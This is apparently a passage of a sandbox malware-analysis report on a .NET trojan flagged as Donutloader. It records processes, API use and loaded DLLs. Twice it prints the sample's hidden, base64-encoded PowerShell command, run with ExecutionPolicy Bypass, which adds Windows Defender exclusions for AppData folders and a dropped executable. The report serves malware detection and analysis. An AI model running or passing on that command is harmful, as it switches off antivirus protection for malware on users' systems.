                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_083B0040
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_083CD240
                    Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                    Source: file.exe, 00000000.00000000.1709874025.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFbaprhuy.exe2 vs file.exe
                    Source: file.exe, 00000000.00000002.1763526633.00000000033C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                    Source: file.exe, 00000000.00000002.1808267831.0000000008F40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAblswvgh.dll" vs file.exe
                    Source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                    Source: file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                    Source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFbedztzxbbe.dll" vs file.exe
                    Source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                    Source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                    Source: file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                    Source: file.exe, 00000000.00000002.1761959990.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                    Source: file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                    Source: file.exe, 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFbedztzxbbe.dll" vs file.exe
                    Source: file.exe, 00000000.00000002.1763526633.000000000368B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenametaskschd.dll.muij% vs file.exe
                    Source: file.exe, 00000000.00000002.1763526633.000000000368B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $fq,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
                    Source: file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                    Source: file.exeBinary or memory string: OriginalFilenameFbaprhuy.exe2 vs file.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.txxbiwtbs.exe.4074c50.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 11.2.txxbiwtbs.exe.4024c30.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0000000B.00000002.2160867351.0000000006470000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000000.00000002.1821399208.0000000009650000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0000000B.00000002.1995844689.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000003.00000002.1869188121.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000000.00000002.1824447213.000000000A088000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@9/15@2/2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E078D4 AdjustTokenPrivileges,
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\RegisteredChannelsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7756:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\210888
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8164:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xiv0j5rn.pb1.ps1Jump to behavior
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: file.exeReversingLabs: Detection: 13%
                    Source: file.exeVirustotal: Detection: 39%
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: taskschd.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: taskschd.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: sxs.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: xmllite.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
